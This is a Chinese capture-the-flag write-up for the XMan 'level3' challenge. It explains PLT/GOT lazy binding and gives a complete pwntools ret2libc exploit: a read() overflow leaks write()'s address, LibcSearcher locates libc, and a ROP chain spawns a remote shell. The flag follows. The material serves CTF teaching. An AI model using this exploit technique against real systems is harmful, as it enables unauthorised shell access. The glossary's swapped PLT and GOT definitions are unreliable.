CTF – XMan – level3 - LibcSearcher

题目说明

题目来源: XMan

题目: level3

read() 栈溢出 ROP 无libc ret2libc 重复调用
这题推荐使用Ubuntu做,不然可能出现没有libc文件而导致利用失败的情况

解题步骤

拿到文件后先查看文件类型是32位的elf文件

检查安全机制,开了NX栈不可执行

使用IDA32查看主函数的伪代码

查看vulerable_function()函数伪代码

总体来说与之前的level0-2差不多

查看函数列表和字符串列表,发现没有system()和/bin/sh,但是载入了libc文件

libc文件

程序开始运行时,会把整个libc映射到内存中,此后在程序调用相关库函数时,会依据plt-got表的机制,将所需的库函数加载到内存空间的某个虚拟内存地址,然后调用时就会通过plt_got表辗转跳至真正的函数内存地址处完成功能

PLT和GOT表

  • PLT:内部函数表(Global Offset Table,全局偏移表)是Linux ELF文件中用于定位全局变量和函数的一个表
  • GOT:全局函数表(Procedure Linkage Table,过程链接表)是Linux ELF文件中用于延迟绑定的表,即函数第一次被调用的时候才进行绑定

延迟绑定

延迟绑定就是当函数第一次被调用的时候才进行绑定(包括符号查找、重定位等),如果函数从来没有用到过就不进行绑定。基于延迟绑定可以大大加快程序的启动速度,特别有利于一些引用了大量函数的程序
延迟绑定的原理如下(灵魂画图)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
加入有一个函数test()
在PLT表中的条目为test@plt
在GOT表中的条目为test@got

当程序第一调用test()时,调用过程如下
1.跳转到PLT表
2.跳转到GOT表
3.调用patch test@got 将test()的真实地址填充到test@got

当程序第二次及以后调用test(),调用过程如下
1.test@plt
2.test@got
3.test()的真实地址

得到完整调用链:Call->PLT->GOT->Real_RVA

也就是说,不考虑第一次调用,GOT表存的就是真实地址

当程序执行时会载入libc文件,那么libc中的函数我们是可以调用的,我们可以在通过GOT表在libc文件中找到system()和/bin/sh字符串的在level3中的地址,但是libc文件中的地址和内存中的地址是平行映射的,所以要计算偏移量,计算出system()和/bin/sh字符串的真实地址

但是这道题没有给出libc.so文件,而不同版本的libc基地址是不同的,但是我们可以通过LibcSearcher模块使用一些函数的真实位置对libc文件的版本进行定位

得到真实libc文件版本后,在程序中查找某函数的真实地址,然后在对应版本的libc文件中查找某函数的真实地址,最后将程序中的位置减去libc中的位置就能够得到偏移位了

得到正确的偏移位就能够知道system()和/bin/sh字符串在内存中的真实位置从而使用ROP进行利用

解题思路

题目给出了vulerable_function(),其中有read()栈溢出,而libc版本的查找和得到shell需要两步进行,所以应该重复利用vulerable_function(),大致的pwn思路如下:

1.通过vulerable_function()的read()构造ROP得到PLT表中write()的位置
2.通过write()得到write()在程序中的真实地址
3.使用LibcSearcher得到libc版本
4.在对应的libc版本中查找write()、system()、/bin/sh的真实地址
5.使用write()的程序地址和libc地址计算出偏移量
6.在system()、/bin/sh的真实地址上加上偏移量再通过vulerable_function()执行得到shell

Payload1构成: 0x88位填充buf + 0x4位填充EBP + 调用write() + vulnerable_function()作为返回地址 + 文件描述符 + got表write()位置 + 写入长度

Payload2构成: 0x88位填充buf + 0x4位填充EBP + 调用system() + exit()作为返回地址 + /bin/sh地址

写出exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
from LibcSearcher import *

p = remote('111.198.29.45','58004')
e = ELF('./level3')

#获取write()在程序内GOT地址和vulnerable_function()调用地址
plt_write = e.plt['write']
got_write = e.got['write']
vule_addr = e.symbols['vulnerable_function']

#获取write()在程序内真实地址
p.recv()
payload1 = 'A'*0x88 + 'A'*0x4 + p32(plt_write) + p32(vule_addr) + p32(0x1) + p32(got_write) + p32(0x4)
p.send(payload1)

write_addr = u32(p.recv(4))
print("write addr - "+hex(write_addr))

#获取libc真实版本并得到/bin/sh、write()、system()、exit()在libc中地址
libc = LibcSearcher('write',write_addr)
write_off = libc.dump('write')
bin_sh_off = libc.dump('str_bin_sh')
system_off = libc.dump('system')
exit_off = libc.dump('exit')

#计算偏移量
libc_base = write_addr - write_off

#得到system()、/bin/sh、exit()在内存中的真实地址
system_addr = libc_base + system_off
bin_sh_addr = libc_base + bin_sh_off
exit_addr = libc_base + exit_off
print("system addr - "+hex(system_addr))
print("bin_sh addr - "+hex(bin_sh_addr))
print("exit addr - "+hex(exit_addr))

sleep(2)

p.recv()
payload2 = 'A'*0x88 + 'A'*0x4 + p32(system_addr) + p32(exit_addr) + p32(bin_sh_addr)
p.send(payload2)

p.interactive()

运行得到flag

flag:

1
cyberpeace{743842687ebd13266fd64132b52bdf3b}

参考链接